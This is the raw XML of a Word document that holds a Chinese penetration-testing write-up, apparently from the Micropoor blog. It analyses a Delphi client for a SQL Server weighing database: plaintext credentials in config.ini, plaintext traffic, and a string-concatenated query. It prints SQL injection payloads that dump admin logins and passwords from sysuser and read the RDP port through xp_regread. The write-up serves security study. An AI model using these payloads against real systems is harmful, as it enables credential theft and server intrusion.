
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable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Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationship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ict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:264.600pt;width:467.400pt;height:249.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId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383838"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注APT攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101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3783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/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程序的主要function，与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-41"/>
        </w:rPr>
        <w:t> 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procedure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1208" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w: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Delphi把操作数据的方法分成了两种，一种是fu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nction，另一种是procedure，大致理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解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为“函数”和“过程”。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Procedure类似C语言中的无返回值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函数，即VOID。而Function就是c语言中的有返回值函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数，即没有V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oid。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79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程序分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为2种连接数据库模式：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25.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId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38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无论是本地模式，还是联网模式，都是读取，当前路径的co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nfig.ini配置文件：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（导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>致敏感信息暴漏，可直连服务器）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317.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:426.600pt;width:467.400pt;height:125.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10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6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继续跟数据库连接：配合SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-47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Server数据库，直接带入，可以判断出为明文存储。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23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config.i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ni配置如下：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351.600pt;height:460.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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5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5755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基于TCP通信，SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46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Server通信构架大致如下：</w:t>
      </w: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（可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>导致通信过程中抓取明文执行）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443.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12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09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代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>入执行：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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（导致可拼接sql语句，查询任意语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或者执行命令）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67.400pt;height:270.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:337.800pt;width:467.400pt;height:110.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14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3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部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分语句其中如下：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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="118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select</w:t>
      </w:r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distinct</w:t>
      </w:r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memberid,receivecompany</w:t>
      </w:r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from</w:t>
      </w:r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weigh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="17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where</w:t>
      </w:r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receivecompany</w:t>
      </w:r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is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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not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null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and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receivecompany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like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2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''%'+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xxxxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+'%''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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>件呈现如下：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48.600pt;width:404.400pt;height:274.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:426.600pt;width:401.400pt;height:154.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:662.400pt;width:467.400pt;height:48.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId17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12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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2357" w:firstLine="0"/>
      </w:pP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对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> 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收货单位编号，以及收货单位名称。分别为：memberid,receivecompany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闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>合语句为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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2'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;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select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loginid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as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memberid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,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password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as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receivecompany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from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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sysuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-23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--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68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抓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>取返回如图：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得到admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-44"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>账号以及密码。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57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构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>造读取远程桌面端口号：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54.600pt;margin-top:258.600pt;width:467.400pt;height:162.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId18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4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得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>到远程服务器端口号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spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2511" w:firstLine="0"/>
      </w:pP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2'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;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXEC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>master..xp_regread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10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'HKEY_LOCAL_MACHINE','SYSTEM\Cur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rentControlSet\Control\Terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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Server\WinStations\RDP-Tcp','PortNumber'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> 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--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4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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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获取缓冲区内容：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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>致可从服务器端构造代码）</w:t>
      </w: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200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="8982" w:firstLine="0"/>
      </w:pP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copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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用法如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（a,b,c);</w:t>
      </w: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a：就是copy源，就是一个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字符串，表示你将要从a里copy一些东西，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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b：从a中的第b位开始c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>opy（包含第11位），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5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c：copy从第b位开始后的c个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字符，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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exp：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-24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m:=‘the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fuck'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10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870" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s：=copy（m,2,2）；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//s值为‘he’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21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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>当超出范围，会发生异常错误。实例中，从服务器数据库获取</w:t>
      </w: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数据后进行copy。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="32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软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>件登陆部分代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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de3f29"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（导致可自动化跑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>loginid。）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ict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:775.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:293.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:402.600pt;width:467.400pt;height:281.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId21" o:title=""/>
      </v:shape>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr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87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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>多次尝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>试错误处理如下：退出软件，并且重新开始计算。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00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385" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pP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5" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>opoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="2000" w:right="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="PageMark10"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11920" w:h="16840"/>
      <w:pgMar w:header="0" w:footer="0"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altName w:val="Times New Roman"/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0000000000000000000"/>
    <w:charset w:val="4D"/>
    <w:family w:val="roman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seFELayout/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<?xml version="1.0" encoding="UTF-8" standalone="yes" ?> 
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" /> 
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /> 
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" /> 
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> 
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/7.jpeg" />
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/8.jpeg" />
	<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/9.jpeg" />
	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17.jpeg" />
	<Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/18.jpeg" />
	<Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/19.jpeg" />
	<Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/20.jpeg" />
	<Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/21.jpeg" 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1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-21T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-21T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>